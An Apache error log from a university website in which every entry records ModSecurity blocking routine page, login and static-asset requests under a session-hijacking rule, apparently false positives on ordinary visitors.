[Mon Aug 28 08:05:31.582516 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvy28Co-f0AAJVZ9fMAAAAR"]
[Mon Aug 28 08:05:31.589358 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KsAAAAF"]
[Mon Aug 28 08:05:31.597584 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvy28Co-f0AAJQeRqQAAAAP"]
[Mon Aug 28 08:05:31.602316 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvy28Co-f0AAJVXJZUAAAAJ"]
[Mon Aug 28 08:05:31.623391 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy28Co-f0AAJSsrakAAAAQ"]
[Mon Aug 28 08:05:31.660882 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy28Co-f0AAJKjZ6EAAAAG"]
[Mon Aug 28 08:05:41.579302 2023] [:error] [pid 38195] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy5cCo-f0AAJUz@iQAAAAM"]
[Mon Aug 28 08:05:41.747139 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy5cCo-f0AAJSxYugAAAAH"]
[Mon Aug 28 08:05:41.935663 2023] [:error] [pid 38192] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy5cCo-f0AAJUwn58AAAAI"]
[Mon Aug 28 08:05:42.498881 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy5sCo-f0AAJU0qWsAAAAD"]
[Mon Aug 28 08:05:43.454640 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy58Co-f0AAJS0EtUAAAAW"]
[Mon Aug 28 08:05:43.604515 2023] [:error] [pid 38192] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy58Co-f0AAJUwn6AAAAAI"]
[Mon Aug 28 08:05:44.895744 2023] [:error] [pid 37918] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy6MCo-f0AAJQeRqgAAAAP"]
[Mon Aug 28 08:05:46.055892 2023] [:error] [pid 38192] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvy6sCo-f0AAJUwn6EAAAAI"]
[Mon Aug 28 08:05:46.155568 2023] [:error] [pid 38150] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvy6sCo-f0AAJUGIRcAAAAC"]
[Mon Aug 28 08:05:46.625688 2023] [:error] [pid 37539] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy6sCo-f0AAJKjZ6UAAAAG"]
[Mon Aug 28 08:05:49.310846 2023] [:error] [pid 37918] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy7cCo-f0AAJQeRqkAAAAP"]
[Mon Aug 28 08:05:49.538537 2023] [:error] [pid 37803] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvy7cCo-f0AAJOr924AAAAL"]
[Mon Aug 28 08:05:49.728594 2023] [:error] [pid 38232] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy7cCo-f0AAJVY6AgAAAAK"]
[Mon Aug 28 08:05:50.130856 2023] [:error] [pid 38060] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy7sCo-f0AAJSsra4AAAAQ"]
[Mon Aug 28 08:05:51.009339 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy78Co-f0AAJU0qW0AAAAD"]
[Mon Aug 28 08:05:51.250916 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy78Co-f0AAJTinXgAAAAE"]
[Mon Aug 28 08:05:52.181112 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy8MCo-f0AAJSxYusAAAAH"]
[Mon Aug 28 08:05:52.225680 2023] [:error] [pid 37803] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy8MCo-f0AAJOr93AAAAAL"]
[Mon Aug 28 08:05:52.229291 2023] [:error] [pid 38060] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy8MCo-f0AAJSsrbAAAAAQ"]
[Mon Aug 28 08:05:52.239442 2023] [:error] [pid 38231] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy8MCo-f0AAJVXJZoAAAAJ"]
[Mon Aug 28 08:05:52.242923 2023] [:error] [pid 38114] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy8MCo-f0AAJTinXkAAAAE"]
[Mon Aug 28 08:05:52.243804 2023] [:error] [pid 38195] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJUz@icAAAAM"]
[Mon Aug 28 08:05:52.248125 2023] [:error] [pid 37539] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy8MCo-f0AAJKjZ6cAAAAG"]
[Mon Aug 28 08:05:52.249582 2023] [:error] [pid 38068] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy8MCo-f0AAJS0EtgAAAAW"]
[Mon Aug 28 08:05:52.291352 2023] [:error] [pid 38150] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy8MCo-f0AAJUGIRoAAAAC"]
[Mon Aug 28 08:05:52.375059 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8MCo-f0AAJSxYuwAAAAH"]
[Mon Aug 28 08:05:52.438485 2023] [:error] [pid 38195] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJUz@igAAAAM"]
[Mon Aug 28 08:05:52.461131 2023] [:error] [pid 38196] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy8MCo-f0AAJU0qW4AAAAD"]
[Mon Aug 28 08:05:52.500164 2023] [:error] [pid 38231] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJVXJZsAAAAJ"]
[Mon Aug 28 08:05:54.438626 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy8sCo-f0AAJS0EtkAAAAW"]
[Mon Aug 28 08:05:54.446385 2023] [:error] [pid 38195] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy8sCo-f0AAJUz@ikAAAAM"]
[Mon Aug 28 08:05:54.680323 2023] [:error] [pid 38196] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8sCo-f0AAJU0qW8AAAAD"]
[Mon Aug 28 08:05:54.889309 2023] [:error] [pid 38231] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8sCo-f0AAJVXJZwAAAAJ"]
[Mon Aug 28 08:06:49.521668 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzKcCo-f0AAJS0EuMAAAAW"]
[Mon Aug 28 08:06:53.808116 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzLcCo-f0AAJSxYvUAAAAH"]
[Mon Aug 28 08:06:54.080185 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzLsCo-f0AAJUFNRYAAAAA"]
[Mon Aug 28 08:07:12.927523 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvzQMCo-f0AAJKjZ7oAAAAG"]
[Mon Aug 28 08:07:13.679509 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzQcCo-f0AAJOr94IAAAAL"]
[Mon Aug 28 08:07:34.659027 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzVsCo-f0AAJUFNRwAAAAA"]
[Mon Aug 28 08:07:34.847947 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzVsCo-f0AAJKjZ8AAAAAG"]
[Mon Aug 28 08:07:43.518948 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzX8Co-f0AAJKjZ8IAAAAG"]
[Mon Aug 28 08:07:43.609753 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzX8Co-f0AAJOr94kAAAAL"]
[Mon Aug 28 08:07:46.072315 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzYsCo-f0AAJSxYwAAAAAH"]
[Mon Aug 28 08:07:46.480606 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzYsCo-f0AAJUFNSAAAAAA"]
[Mon Aug 28 08:07:47.778845 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzY8Co-f0AAJKjZ8MAAAAG"]
[Mon Aug 28 08:07:47.898882 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzY8Co-f0AAJOr94oAAAAL"]
[Mon Aug 28 08:08:20.960591 2023] [:error] [pid 38150] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvzhMCo-f0AAJUGITQAAAAC"]
[Mon Aug 28 08:08:21.509186 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzhcCo-f0AAJSxYwYAAAAH"]
[Mon Aug 28 08:08:46.772900 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvznsCo-f0AAJOr95cAAAAL"]
[Mon Aug 28 08:08:46.977450 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvznsCo-f0AAJU0qY8AAAAD"]
[Mon Aug 28 08:09:03.704920 2023] [:error] [pid 38065] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvzr8Co-f0AAJSxYw8AAAAH"]
[Mon Aug 28 08:09:03.804867 2023] [:error] [pid 38196] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvzr8Co-f0AAJU0qZQAAAAD"]
[Mon Aug 28 08:09:03.840227 2023] [:error] [pid 38195] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvzr8Co-f0AAJUz@kkAAAAM"]
[Mon Aug 28 08:09:03.985737 2023] [:error] [pid 38149] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvzr8Co-f0AAJUFNSoAAAAA"]
[Mon Aug 28 08:09:05.749437 2023] [:error] [pid 38149] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzscCo-f0AAJUFNSsAAAAA"]
[Mon Aug 28 08:09:05.915972 2023] [:error] [pid 38075] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzscCo-f0AAJS7R4QAAAAB"]
[Mon Aug 28 08:09:09.108938 2023] [:error] [pid 38196] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvztcCo-f0AAJU0qZUAAAAD"]
[Mon Aug 28 08:09:12.816884 2023] [:error] [pid 38075] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzuMCo-f0AAJS7R4YAAAAB"]
